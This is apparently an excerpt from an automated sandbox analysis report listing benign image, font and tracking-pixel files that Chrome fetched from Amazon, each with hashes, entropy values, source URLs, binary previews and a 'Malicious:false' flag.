                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...............................................................................................t.2r}.Kh......p..`.....7..+6......k.H.p..............S..o.....@....*..,(..Z..Y.'.:yr....#..`r......WI....4.`...........QN........8...n.W.j...F..l..+.(iH}X.....tdm........[....A.Z.`...........YU.....^.(...vy5]}..........hNY.8f.l.|.y.wT.;..|.....l....QB....]..}P...............\5.V.x$7........^.{n+.....C..&...w.<.vj]........}.I...z...+Y..Z....&V.E.g.6...........{5..}...3....fZ`f..O,.={.^.k..3.......Yb[..e...2.Kg.vZ......^x.^.................4,.6.H.......~......s....7...=4oB....7DJ.r.@l.a..M....../.-..Cbb.F..............5..S9vs.go/r.EV.o_5sT...%.L.a.V.....N?........U.=^..F..G...b.H..............5..}.O..Q....w....O..R.sa..4..#m...6E.nJ7d.]e.sv.J.[(..V...W..xx.4T..x..h........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4119
                                                                                                                                                                                                                                                                Entropy (8bit):7.888677027917507
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TxXslZ1uqS4BG2/slaK63PDuMV/LyqNySHRAa5CpW50:izEiD/ZKwrus/LvrHF8WW
                                                                                                                                                                                                                                                                MD5:DCF43FDB604979CCA05427CC32DC2850
                                                                                                                                                                                                                                                                SHA1:FB4934945EF5D284A69A193E975B7661D127B8EA
                                                                                                                                                                                                                                                                SHA-256:8E442B455E6EFB426B4D636B525C3E3368792F4D610B270C3D3967A6C009E0AB
                                                                                                                                                                                                                                                                SHA-512:3EBD82451B82ED87C29E28B9C9ACA98F3C60D1F0CAF8060AD6444E634D1035C12FE4C7A65A2067063C7595DA92212EF4FE8CEF20446391EC94E83A7BF001585C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!.1A.."Qa.2q.......#BR......$%br..CST.................................................!1.....Qa."ABqr....R...#............?.....h6.<..R..^Z..+.^....q..-.D.Ltf.+4.Y!.V@.....v..1.z..*c.[...cP.3.K......et.#e.j.....t....f'...{m.,.z...F..O.W.v/.G........R.........arH.w..+.M..^.....+..z.y.U..J....)J.5..R.....4..R..)JR.".2....k4...c..'..z.....E..o.WB..|......Q.1..W...n:.R...~..x.<.#.q...2.......VU,.+.u....M..j..I..$.X...N7$.U&..u..O..Hb.\.N..:|.}+.o....1../....:p.9...?....g.s..V.c...3..:...........g....&9.1L.1...k.~..7R.|.3..*ip..Ec......9.k.U.5n/b.3d-.g......d......)";.oA"....-.9ow.^.=I.k..%..WB.7.8..~.5._f.<...>...T...!;.c..k"......./.....\...4..]..|.|....>.....rG...s.g.)..p..H..`.o.>.w...J0.<......j......z..'.....L...db.+...t.)J@..(.EJR
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 65400, version 1.19661
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):65400
                                                                                                                                                                                                                                                                Entropy (8bit):7.995681509823362
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:1536:msfO1TqlmnlfgjCcFQkk7wd6sX37kbV4AKB:nfOclmlo2cFQkk70Y4VB
                                                                                                                                                                                                                                                                MD5:68658972CEF5823AAA45770AD15DF48E
                                                                                                                                                                                                                                                                SHA1:B7B102C865F7F9FD7E161BD6795147421A8E6CFD
                                                                                                                                                                                                                                                                SHA-256:FAE8D9892169EDC72006FBC01C8A55C20C98DDD38F1FB927E817D290F398CA92
                                                                                                                                                                                                                                                                SHA-512:59D3991F1F4B1D53ACE39E1B9C00E3C66DD6EB4A7C5E19F7168EA2C8BA401264A650B2CDFF859566C51E5F12C773BCE63F8D33A7ABF48B888E0BE6C4BF87EFF4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/01/wg/assets/fonts/AmazonEmber_W_Bd.woff2
                                                                                                                                                                                                                                                                Preview:wOF2.......x......$L......L.......................n...Z.....`..J..............6.$..P..j.. ..8. ..[5.........M.[.....s.I.JKQ.}?.....xZ.3.F....2...`.................................#.l.....(...........2d......r1FuH\."...R....zuc........-..S=....e@.....d..)......N,...l.p...e._&........z..w..l..`...f.!.....{.3..p3+j....3.]o.n..6#.o.%.QJ..+r.3.Rr!.Op1.@..(..p.,s. ...D..a...]t..s...BEO7.bz>`...x/VeQD...D..B.,..M..M..,.X.w..4M.V.....c.. ....4........ .Z..A_ym-;...I..,...{+...K....H..X..6.W.2.....d;.....b.$k..!+...\.>J..m1.6y*....\.o.|.........q+M.-...'.Ur(.-.B..@|e..*xSn.;.......R.(..3.?.G|Y.aRn/y..........K....eG......j...}r$.P......&+A..._J.;s..k0.74.W....Z.....<.1.I.'....?<....$......*O.dc..M...._....7...y].e,h.b.%.9H.w6q..?.$..^.w..e.c.8.~.....?.?....?}.nO..{q\.sL....>Y...+......Q..w.t..7u........ D..l2....P5Z..0go.v.......".Zj.C..{]...O..=.=.g.p.....A.`OZ......QCB....\+.Zs.WZ..\...RIi..b.(...l..b...o..|.Ul...........y<=..'..F..3w..$..o..Z!$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 98x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                Entropy (8bit):7.7647764155096315
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rvleGDGkdgA9vZihUttjsiR+Zg08lAc9fs:TOeLv8vZgU3jrR+Z982+fs
                                                                                                                                                                                                                                                                MD5:0260BEAC4994437004EB74FFA622521F
                                                                                                                                                                                                                                                                SHA1:3A42244DF783C4455EB19A149254C0CC9B098744
                                                                                                                                                                                                                                                                SHA-256:58F77060B271AF55A01F0E3B531AA4415A6582E8163798F051991F0FB2FD74E0
                                                                                                                                                                                                                                                                SHA-512:22912939539916A4E58139C0E1D7CDA09FD5757045DED8973914F67CF5EE52C79C906F7F7B9AC00EFDB5D82697E160834B13148F35181E8AFC79C45A45DB3E99
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........b.."..............................................................!q...."#1Ar.&Qas...$%234BSbc.....D......Rd..............................................!............?...i...$..kz\N@k)p....*%<....$.......V....I..t.....s..... ..q.L.K....<L~.....T......E..~....8.....|....._E.3ty.-E]..[q..^......q......[M......G..G.oqie.].7.aQ.K.ey.S../..L.L<RC..cY=...ZCn.e.i.....5...aT.. ..s.M(:B.}....Q.....4....|..Yr....8..y.Vu.....7t...%..~..#.+G).....DA.c;..Y. <.#........I..|...y...z..yV.PU%y.T._.y...nc..+.jUg... ...E...Y..N..'ui..X....A...w. ..Q..*.....`.>D..p...^~J.m....;.......s.:....8!q.....i..<.7....".s......T.Q|D....CS+>f.....*!VA.]-...;.Z..>?.wr.......k{..I...x.,....s2vJ.....i..~.E..P?....1.!.h...{.h.q.`.kK....t.J...._.I)....X..v....F>H..<8d1.N..t..t.iPM....\..=O.....5.p.........U......m..0...u.eQ
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4521
                                                                                                                                                                                                                                                                Entropy (8bit):7.8120881867521925
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:LUGuCloDgu088d96JMa7oV3wySlszcHsQVZY+oFqT5DV82:LUGudgndd0J17SyFMQVZYUr1
                                                                                                                                                                                                                                                                MD5:EDBCD73DB073CECBD97B7A4A9B63286F
                                                                                                                                                                                                                                                                SHA1:2F9FF0AAA3C47AEE01A17772FF56C736476CA5E2
                                                                                                                                                                                                                                                                SHA-256:00225623C559C59037352A965875DE2865D043398AF152F76A36ACE7E2EE86FF
                                                                                                                                                                                                                                                                SHA-512:78176D6580664DF74260E03485EE3A261677FF2A4F99EAF2729A6176FF3226B1E208432076CA9667F298EDA4641BCB403505697DB9A68EF3473AF492CC148E63
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........:.........................................................................b......A........;..*.7..h!J.=..=......3.4.T..a...z...d.ua......ZCo..z.&.-xTZ.j...D..i.......n,.e;....R.......T...............2Q(.e..o.]....oJ...k.......z.\f1<...]..;.".R...z.....Fq7.F..w$Q...A+...2.........-h.Z....6....v.v..lb.' ..@.R.z.9..y...q\...ez@...C.....k..|......%.F...s....|r.~C................T.............................!1...$%5AEU..&0equ."'4DFQRT..... @Prv.....6BVWa..............?.....j.6&..V8/....~.,.....5..--........Y..PZt..m........R.O......l..-S.G+.......SW.... .....B..n...m+P[M..!...........-........p.*..O~..<.O.@U'..}..1..1...f...;..dD..>.......5$.........l6..... ,F..P.$Z.n.._/..(.5....L...-.qC.c.p$......].gf.^..+....nN...p.fI?.....5X..:..j....=&..6m..Gy.]..s..",qC.<.a....P..1
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):18077
                                                                                                                                                                                                                                                                Entropy (8bit):7.9375968132249595
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:rKA49dJTt8Ax2SG0cIADtfKWU55zLcyvXLDyaxe:rKAghvx2S5cbtfnKzjvXXA
                                                                                                                                                                                                                                                                MD5:5154970B539E650C8EA02BD984414EAF
                                                                                                                                                                                                                                                                SHA1:0DA32F4D5066E57232F2AE03E390A1211766899A
                                                                                                                                                                                                                                                                SHA-256:97AB035C1D8BE45955F38D5FA6DCDAF825BF99009EA9DE032CB9CA9051C02114
                                                                                                                                                                                                                                                                SHA-512:7A691ADF5465571357DA2B27DA220693CAEE5BEDBB2D826A9970EB90CFE7A7BBC5C75A266186F8DBBC049EE464CE4136D4985C78E2724742CFCBA2C8346DADF3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/81B7s-7r48L._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5.........................................................................K.n%4..`......5...j(....j/&...n...m[VnF.5..-..}..q..............b.h....t..|!..x...<......<.kM....^.Mr...G.9..O...w.l...._oR\v...7...^.8..7..-dqg...............y.S..Y[....../.+.s..q>'....V5^.<.........<..=......Z.d.bG."..+2.?..[.u6J...;..w...d...........r.5.-N...|..J.kY6.Gj.Y.:....|.*..^...GG..eyT....k>...|\7...V:.Ya.x.ON.j..S.3@............._F.....o......F4.l............c1\..;......&.H......[...C..".)M...m.nM>.4.|...........<..k.j.N.s.Y.Z.......z.%...y....r..NO2.%....O....r1..:...97^cU..tWZ.(......S.s@............Qv.....a...q...$......f.]..z._1..Q.>.w..n.....k*n.L-v.3.l...TW.......M..............>t.q...H.3XVJ.x.%..OQK...p.:.cQ..y...E..7m%....c~..j^....M............&................zla
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):178844
                                                                                                                                                                                                                                                                Entropy (8bit):7.713853466443925
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:qPrZ/w+PmX+GZy8byYor5MEcz90dqdE1J2b8VCQQ98gYxzBaUfxe:QrMz1byY0M7z90dmETtgFqjRfxe
                                                                                                                                                                                                                                                                MD5:6A1276978399E431D44DF9D89D3A8020
                                                                                                                                                                                                                                                                SHA1:974B3FF2CB4650C6035A5A6E2EAD13610C6E4AD1
                                                                                                                                                                                                                                                                SHA-256:E38533851B852AA353E514439FB5CBAB2A80751BF5C4606464066E4929D0CB9D
                                                                                                                                                                                                                                                                SHA-512:190C810A5406C03142BB6289BFD172B7C0496D28100851FC0F3F39966FC83E42BC8DE29A151DBEF005116FFD8A14C252837C9A274CF983C77E06140BB0020652
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/711ACtMeHvL._SX3000_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................8.......................................................................4..................................................................`........................`..(L...........@L.....2..Be...@..&P.....d.c.2y..5..5 ...............H.' ).'*@.' ?Y ....@................................................................0.......................0.0...P...........2..`.0.@...e..&P.`.....&........E ............NT... '*@........$....H................................................................&........................&.....(L...(L.&...L.........(.............1..0.!............... ..r.'*@...).9~.F... .................................................................`...........&......P..........(.0.(.0......L...L............qY.F9....V....H..........' . ' ).............H................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1599
                                                                                                                                                                                                                                                                Entropy (8bit):7.544935724436636
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6v2bWPXa9bS7/RabWbFpD5g83FxL1WybbbR:TZv2bWfa2/MbWbFpD5FDUybbbR
                                                                                                                                                                                                                                                                MD5:7E3BE9F05D717AA9B5B8EFF87A0DB2ED
                                                                                                                                                                                                                                                                SHA1:FA4129AEAF2B91E5B9009176F318CE1A93F53BD7
                                                                                                                                                                                                                                                                SHA-256:8B4A307A0EA37F59D262F1209CD84A84FCCD4613335A97D9BD7D232646C610A4
                                                                                                                                                                                                                                                                SHA-512:A0DBA04BCFAB074F305FAC0F8F50C98919CD21B1BD7FCD1210D87BA4C3E42408F28BD003A5946D3246BD3C448FB5EAD2BC4FFB318E8E4040F6B4100DD32901DF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x......................................................!1Q.q.."ARab....#2BSc..$s...................................................?...D@DD.D@DD.UZ.j.f...N.!.i......o........fV.)W..e.F..v.,q..0B..p%.................j}..J...j....[..N.&....Vcf.-.a...{...Ihk.=.......a..../..7.......#.-.PqA..s.Q..3.jF.."dM..'...j..t.{3\.....+....................B.Q.r.L.............I..........p...F....4.@,...e.J.67r.]....;.v..)...Y..(f./.A....F....}.._6.....l^.5..;...(={7..0*RL4..y..a.E6V..!c".h.5.h..4...D@DD.D@DD.D@X.n...=...p.......`....X(...N.y.X.(:9..<...i.].._...:..b......78..:.}$.Z"..%X...v-.....C=..3..F....cX.0.V....2@...w...S.:.2...Lz.1.....@.H...............`.......].b..P...p&I.f0_...R...!.]..B....4..\yV+jc..lL....,.N.........X1..F.._+...u.-..B?.....R..9..o...+..<......K..............\...P.?..i..O
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):23454
                                                                                                                                                                                                                                                                Entropy (8bit):7.960066050617329
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:362XylC7saGwgkGOYIChPIQWFzBUz2jj2KKEqGybtQNL5Vn8XN9HGUx4fjhsizyD:3slCYXwgJOY90jjhKEqGymL5+99TuhjQ
                                                                                                                                                                                                                                                                MD5:D63CD26924F97276B0E35C239A8EF3AA
                                                                                                                                                                                                                                                                SHA1:27CB6AE43751E84805B9F5840DF93BB19E099EDC
                                                                                                                                                                                                                                                                SHA-256:C04CBBE569EA56DC1AB5BF5E0857A0ACFCE9A030E4DB5D4AF42CA4FDFF4C51C8
                                                                                                                                                                                                                                                                SHA-512:22723EA8A6BFCA3842B8A89CC75BF644AAAEB66D7C4F6B9B7128AAF4F2B9A7B38E50E68EA5E15FEE5FD30DF3221F2049854D9CEA4997E51C5B48A7D8A0D0A0CE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......=......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:FC03975124CB11EFA30E8F55AA993B0A" xmpMM:InstanceID="xmp.iid:FC03975024CB11EFA30E8F55AA993B0A" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="2AD725D48FD3018F515EAE113945F37E" stRef:documentID="2AD725D48FD3018F515EAE113945F37E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5453
                                                                                                                                                                                                                                                                Entropy (8bit):7.911291994674472
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TM4CpaL8sYNn+oNHDph9+CkclpNB4brphlChyIA4YUHWi6h3mbUwJkkBrfR:A4CYLiNPlh9DpNB4hChPPV4+TkkVZ
                                                                                                                                                                                                                                                                MD5:8084EC149A70E28D9B38626FEAAF17BF
                                                                                                                                                                                                                                                                SHA1:3A0BFA54B6CB380276AE04F9C7CFEAB268CAC15B
                                                                                                                                                                                                                                                                SHA-256:6FB2013BE8388D959E325BEDFB0BDD5B600770818088D7FD1BB1AB96C4AF08F3
                                                                                                                                                                                                                                                                SHA-512:3A30FA21AAAA6E5DAF6C7C3BCD481ACE9575F4D7DA18E51E9804F421D0947E21411A499A66FE227FCD2E13A04D85DCAF63ABAD79527F9C8A24C37728FB3E914F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1.."AQ23aq....r...4RS.$.#B.bc......................................................!1.2Qq.3Aa....4Sr..."#BR.................?..." ...""..]..K.5...4................`.8.3K...{....A.T...$.........F..W..P.... @.u....w.p+.8..U> gU..r.E.>. .......'....M;.4..R...P..e.W.}.y...'+.J....O.q|).......G\.k*:Y!.N?.ys.>.pp...=..B\.6...6......'..Oj.Wi..lh....8..s.:...&6..n.[.....K...=.4.@)g..y.....q....e.....^.4.....?c...t....r.#.s.$..V..j|.....\vn.[..Q.uG..}..Kd.o.j.$.:#...&.....+#..A.{S.l....U..H.]...\...?...X..?..p...6x...$..+.c....+.d.G.~ ....E.N:.cL....'.1..K}wb.R.1..c." ...""...." ..."..N....2..w..f=Q_3..f..}N.[...LtQ.bx...8.......B.H..p....s.L..<.\..@.>..Z..h.J...H;.....z...3..j.<n../j.T.4....s^..B.O`mP...8.9#.m.f...?'.y...&....G.*X.EU.Y...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4051
                                                                                                                                                                                                                                                                Entropy (8bit):7.880041112967082
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Ta0fHvzbvskS0xc+UMp8TDUbbywjLKMJsysz7/dhm7Gb7B:+0fP/sR0xc/s8TDUbbyEmsa/dDB
                                                                                                                                                                                                                                                                MD5:7F4C92686943C8CCD59E5CA27230B520
                                                                                                                                                                                                                                                                SHA1:BE24E290BC1606458A344384C270089B540348BF
                                                                                                                                                                                                                                                                SHA-256:02A01E3AAC3B204EDCCCFCD7479FD2939D88119DE32759EE91CE36B1E1EF33FB
                                                                                                                                                                                                                                                                SHA-512:9EDA91D9B2F4C7A39C2C9BBE46F6CFA2AD366CE19CD1016C0C981242B87F03EC8F3E58EDF8001569E5794FF3A6DD1D3875CBF4B64AFEA28C07B9651F2FD4327D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61YiMXsy7SL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.AQ.."aq2....3BR..#$b........%45st&Cr..................................................1.!..2A.."3aq................?..D@DD.D@J.vT....k..".[.aR.re~.>...^.c..[.x.P....i......*.H..0.r...syj5\..^=.f.......9..P...7<`........~K.......}..:.7W..\.7.d.t..c2J....t..Y..qh....~.....qL....<....8..Q..Y Z..Y*.x..#.:........4/......[n.....h.?kg|Tb..Y...sOGx...,...$...^...w......w...>.p..J.Z........+0z.[..d.i./..E&"id&.LN.9.P...<=jD..5':U..Fp./i.eH......r...u1..z9ax...........................mK..$.<A.!..R.{.......L..X....2r.g..p..8l.k.*..".O.V.y>.Et}w...j....x.E]...:....W..g:....ig?\@.+#xs.u..-...{D#u...U..~....vG...m..}Q.3.._..M......1../.N..Y)OxI..4.....P......wq3..M`..<....bhc.......q...n...]...lcu.3.2...{!uc8.G.Y.erl......w10.3.$..h.U...Lk.+.....<.C..n
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26ctb%3D1%26sc0%3DjQueryPageShow%26cf0%3D16640%26pc0%3D16640%26ld0%3D16640%26t0%3D1723469060962%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16640
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14550
                                                                                                                                                                                                                                                                Entropy (8bit):7.920838096694284
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:umSOhztXK7rPJFKyTjkLlGtOFX0MNM+gsH7GhUg:umFL67dTjkxTF8+M
                                                                                                                                                                                                                                                                MD5:0369B2E96204F994F71A6C79D7ECEC02
                                                                                                                                                                                                                                                                SHA1:D3B157365DA06466A04EA1A2C2E9717C822C292D
                                                                                                                                                                                                                                                                SHA-256:1234F84F8F47660B81A577F0947F8509C3BF07857C9C13D22665A64281D3A71D
                                                                                                                                                                                                                                                                SHA-512:77409D4C3873D9E30CECD678AEDA707F3AFF99E8055F55B5B9C53BEA09B506FA6C2BF33DC3064A496FDD472D8D1745A3333B68905AE671881259A6CCF4033FA5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259753_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2............................................................................OU....v.O..@.(H~~.............=mv.....\...o.H....TGco;5.u.u-..$.*.........|g...............:.9...e}..!(......<....^.r@..............~.o..YH....9....<L>.:............Ni:g.y.........$#..y..t.........................Y.q.(..........CQ._q.............Z......p.8w...#..._.~...8.\B.m:)ts3.~....Z........{D.....{{h..3k.t=.n.yae@s.[Td... 1.xvU.....V7y.U..5>t.x...L..g1U.......<.......U.&..............k...G..........YeR}..e.6.1..Ek.r.T.6|0z.Y=/....u..y._:...V.F..m.....ka^;...#...N.s....q?{.;......@..........q..s.B.4...n.:.*.yWm.....hY....+i....{(n.SG.c...aS.E8.B.]...s.3z..6....A"...R..3... ....{.uz.....fgq[.....m3t..j..N...d;...h.q...US_..4.6..-.:j.j......ZZS.m.T.4................Q....Mef.?;...u....d..N.5.mIl!.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 1500 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16556
                                                                                                                                                                                                                                                                Entropy (8bit):7.961989012448859
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:kPTrcEPVmm1FDDTCzBkt34iMxJdg85dFVAvzyNre64IF:UTrHPlnCzBGFMzf5ETQ
                                                                                                                                                                                                                                                                MD5:7976490D90D2616AD467D5D9FED797C5
                                                                                                                                                                                                                                                                SHA1:44584DBEFD97834892F8A9FF846994746A62BA63
                                                                                                                                                                                                                                                                SHA-256:3591CEE8B7E2D2FFF0F13578B0963FB45C67B8246D592F586865A80B64BFA527
                                                                                                                                                                                                                                                                SHA-512:79FAF658C6FD3CA13129CE172D0F313FE973F4CF77F43A874483B8F3230DE02D851948EB252FD6B5353E490F22EB786CFD9058964CDA21E373B465979BFB8CEB
                                                                                                                                                                                                                                                                Malicious:false
